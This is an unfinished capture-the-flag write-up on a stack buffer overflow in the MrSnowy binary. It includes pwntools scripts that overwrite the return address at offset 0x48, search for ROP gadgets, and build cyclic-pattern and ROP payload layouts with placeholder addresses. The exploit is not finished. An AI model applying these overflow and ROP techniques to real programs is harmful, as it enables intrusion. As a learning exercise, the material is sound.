# MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.

## Flag

Not pwned

## Progress so far

![vulnerable function](images/investigate.png)

- The `read()` reads up to 0x108 bytes of input from stdin
- The buffer is uninitialized
- The `read()` call sits at `*investigate+67`
- The stack frame of the function is only 0x40 bytes, so the 0x108-byte read overflows it by a wide margin
- `checksec --file=mrsnowy` reports NX being enabled
  - So no shellcode can be placed on the stack unless there is executable space elsewhere
  - This hints at ROP chaining

![disassembly of investigate function](images/investigate_disass.png)

- The binary should be patched to get rid of the time-consuming animation
  - Just `nop` out the `banner()` function call using radare2
- Overwriting the return pointer of `investigate()` using pwntools (0x40 bytes of buffer plus 8 bytes of saved `rbp` put the return address at offset 0x48):

```python
from pwn import *
import ipdb

context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']

e = ELF("mr_snowy")
p = process(e.path)


# read banner and stuff until input is requested (the menu prompt ends in '>')
def do_read():
    while True:
        ll = p.recv()
        print(ll)
        if b'>' in ll:
            break


# if not patched, wait for the animation and send 1
do_read()
p.sendline(b'1')
do_read()

# write 0x48 bytes of filler (0x40 buffer + 8 saved rbp) and overwrite the
# return pointer with a guessed stack address; under NX this faults, which is
# what we want here: a crash we can inspect
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```

- Trying to find ROP gadgets using pwntools (`rop.rbx` is pwntools shorthand for searching a `pop rbx; ret` gadget, `rop.gadgets` lists everything it found):

```python
from pwn import *

e = ELF("mr_snowy")
rop = ROP(e)
rop.rbx
rop.gadgets
```
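The payload layout above (0x40 bytes of buffer, 8 bytes of saved `rbp`, then the return address) and the 0x108-byte `read()` limit are worth working through once without pwntools. The block below is an added example, not code from this writeup or from the challenge: it implements a de Bruijn cyclic pattern to confirm the 0x48 offset from a crash value instead of reading it off the disassembly, and it lays out a ROP chain in the `investigate()` frame while checking that the chain still fits into the `read()` budget. The gadget addresses it is called with are placeholders, not gadgets from `mr_snowy`. It uses only the standard library.

```python
"""Stack layout helper for the investigate() overflow (added example, not the
challenge's or the writeup's code).

Assumptions, taken from the writeup: a 0x40-byte local buffer, the saved rbp
directly above it, the return address above that, and a read() of at most
0x108 bytes. Gadget addresses passed to build_payload() are placeholders.
"""
import itertools
import struct

BUF_SIZE = 0x40                    # local buffer of investigate()
SAVED_RBP = 8                      # pushed rbp between buffer and return address
RET_OFFSET = BUF_SIZE + SAVED_RBP  # 0x48: where the return address lives
READ_MAX = 0x108                   # read() size, upper bound on the payload


def p64(v):
    """Pack a 64-bit little-endian value (same as pwntools' p64 on x86_64)."""
    return struct.pack('<Q', v)


def u64(b):
    return struct.unpack('<Q', b)[0]


def de_bruijn(alphabet=b'abcdefghijklmnopqrstuvwxyz', n=4):
    """Lazily yield the de Bruijn sequence B(k, n): every n-byte window is unique,
    so any n bytes read back from a crash identify one offset in the pattern."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern (what pwntools' cyclic() hands you)."""
    return bytes(itertools.islice(de_bruijn(n=n), length))


def cyclic_find(subseq, n=4, limit=0x10000):
    """Offset of an n-byte window inside the pattern, or -1 if not within `limit`."""
    subseq = bytes(subseq)[:n]
    window = b''
    for i, b in enumerate(itertools.islice(de_bruijn(n=n), limit)):
        window = (window + bytes([b]))[-n:]
        if window == subseq:
            return i - n + 1
    return -1


def max_chain_len():
    """How many 8-byte gadget slots fit between the return address and READ_MAX."""
    return (READ_MAX - RET_OFFSET) // 8


def build_payload(chain, fake_rbp=0x4141414141414141, filler=b'A'):
    """filler | saved rbp | gadget, gadget, ... laid out as investigate()'s frame."""
    body = filler * BUF_SIZE + p64(fake_rbp) + b''.join(p64(g) for g in chain)
    if len(body) > READ_MAX:
        raise ValueError(f'payload is {len(body):#x} bytes, read() takes {READ_MAX:#x}')
    return body


def frame_view(payload):
    """Read back the qwords that land in the saved-rbp slot and the return slot,
    i.e. what a debugger shows as rbp and the value at rsp after the ret."""
    rbp = u64(payload[BUF_SIZE:BUF_SIZE + 8])
    ret = u64(payload[RET_OFFSET:RET_OFFSET + 8])
    return rbp, ret


if __name__ == '__main__':
    # Step 1: a crash with a cyclic pattern; the saved rbp slot holds pattern bytes.
    crashed_rbp = cyclic(READ_MAX)[BUF_SIZE:BUF_SIZE + 8]
    print('saved rbp offset:', hex(cyclic_find(crashed_rbp)))
    print('return addr offset:', hex(cyclic_find(crashed_rbp) + 8))
    # Step 2: the chain budget and a layout with placeholder gadget addresses.
    print('gadget slots available:', max_chain_len())
    pl = build_payload([0x401016, 0xdeadbeef])
    print('frame after overflow (rbp, ret):', [hex(x) for x in frame_view(pl)])
```

On x86_64 a `ret` into a non-canonical pattern address faults before `rip` is updated, so the pattern bytes to feed into `cyclic_find()` are the saved `rbp` (as in the demo) or the eight bytes at `rsp` in the core dump, not `rip`.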